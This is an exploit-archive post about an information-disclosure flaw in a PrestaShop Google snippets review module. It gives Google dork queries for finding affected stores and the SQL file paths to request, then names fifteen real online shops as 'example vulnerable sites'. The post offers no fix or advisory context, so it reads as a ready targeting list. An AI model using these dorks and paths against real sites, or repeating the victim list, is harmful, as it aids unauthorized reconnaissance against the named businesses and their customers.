facebook facebook twitter rss

PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure

Author: KingSkrupellos , Published: 27-12-2018
####################################################################

# Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/en/seo-natural-search-engine-optimization/
6144-customer-ratings-and-reviews-pro-google-rich-snippets.html
+ sourceforge.net/projects/prestashopratingreview/
+ codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945
+ storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html
# Software Price : 100 Euro
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0± - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 -
1.5.6.1- 1.5.6.2 - 1.5.3.1 - 1.6.0.12± - 1.6.1.1± - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/gsnippetsreviews/sql/''
intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''
intext:''© 2018 - DECO LED VLC''
intext:''Powered by e-com''
intext:''© 2018 Sud Corner tous droits réservés''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

####################################################################

# Exploit :

/modules/gsnippetsreviews/sql/install.sql

/modules/gsnippetsreviews/sql/uninstall.sql

/modules/gsnippetsreviews/sql/update-date-rating.sql

/modules/gsnippetsreviews/sql/update-lang-review.sql

/modules/gsnippetsreviews/sql/update-voucher-fb.sql

###################################################################

# Example Vulnerable Sites =>

[+] vinta-quatre.com/modules/gsnippetsreviews/sql/uninstall.sql

[+] himmelslaternen.ch/modules/gsnippetsreviews/sql/install.sql

[+] decoledvalencia.com/modules/gsnippetsreviews/sql/install.sql

[+] cactose-boutique.fr/modules/gsnippetsreviews/sql/install.sql

[+] kakicrazy.fr/modules/gsnippetsreviews/sql/install.sql

[+] originalveniceshop.com/modules/gsnippetsreviews/sql/update-date-rating.sql

[+] sudcorner.com/modules/gsnippetsreviews/sql/update-lang-review.sql

[+] cobureau.net/modules/gsnippetsreviews/sql/update-voucher-fb.sql

[+] mondo-bougies.com/modules/gsnippetsreviews/sql/update-date-rating.sql

[+] rygeshop.dk/modules/gsnippetsreviews/sql/update-voucher-fb.sql

[+] nsbconcept.com/modules/gsnippetsreviews/sql/update-date-rating.sql

[+] ventiladorestecho.net/modules/gsnippetsreviews/sql/uninstall.sql

[+] mediaperfect.fr/shop/modules/gsnippetsreviews/sql/install.sql

[+] tu-instrumento.com.ar/modules/gsnippetsreviews/sql/update-voucher-fb.sql

[+] multicouche-et-accessoires.fr/modules/gsnippetsreviews/sql/update-date-rating.sql

####################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :